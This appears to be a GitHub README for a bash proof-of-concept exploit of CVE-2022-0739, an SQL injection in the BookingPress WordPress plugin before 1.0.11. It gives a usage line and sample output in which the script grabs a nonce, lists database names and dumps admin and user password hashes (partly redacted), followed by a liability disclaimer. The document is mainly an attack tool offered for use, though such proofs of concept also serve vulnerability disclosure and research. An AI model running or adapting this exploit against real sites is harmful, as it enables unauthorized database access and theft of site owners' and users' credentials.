/CVE-2022-0739

Simple bash script to automate the exploit of cve 2022 0739

Primary LanguageShell

CVE-2022-0739

Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)

#Usage Supply the URL to where the Booking Press plugin is in use on the application.

bash exploit.sh ''

e.g. (Hashes are redacted in this demo)

	┌──(user@user)-[~/]
	└─$ bash sqli_exploit.sh 'http://localhost/calendar/'
	    ____              __   _             ____                     
	   / __ )____  ____  / /__(_)___  ____ _/ __ \________  __________
	  / __  / __ \/ __ \/ //_/ / __ \/ __ `/ /_/ / ___/ _ \/ ___/ ___/
	 / /_/ / /_/ / /_/ / ,< / / / / / /_/ / ____/ /  /  __(__  |__  ) 
	/_____/\____/\____/_/|_/_/_/ /_/\__, /_/   /_/   \___/____/____/  
			               /____/                             
	   _______    ________    ___   ____ ___  ___        ____  __________ ____ 
	  / ____/ |  / / ____/   |__ \ / __ \__ \|__ \      / __ \/__  /__  // __ \
	 / /    | | / / __/________/ // / / /_/ /__/ /_____/ / / /  / / /_ </ /_/ /
	/ /___  | |/ / /__/_____/ __// /_/ / __// __/_____/ /_/ /  / /___/ /\__, / 
	\____/  |___/_____/    /____/\____/____/____/     \____/  /_//____//____/  

	[+] Exploiting http://localhost ...
	[+] Vulnerable url at http://localhost/calendar/...
	[+] Gettting nonce...
	[+] Found nonce: 219087f4c2
	[+] Extract database name...

	information_schema
	test_db


	[+] Getting creds...
	admin $P$BGrGrgXXXXXXXXXXXXXX
	testUs3r $P$B4aNM28NXXXXXXXXXXX

DISCLAIMER

Usage of this program without prior mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.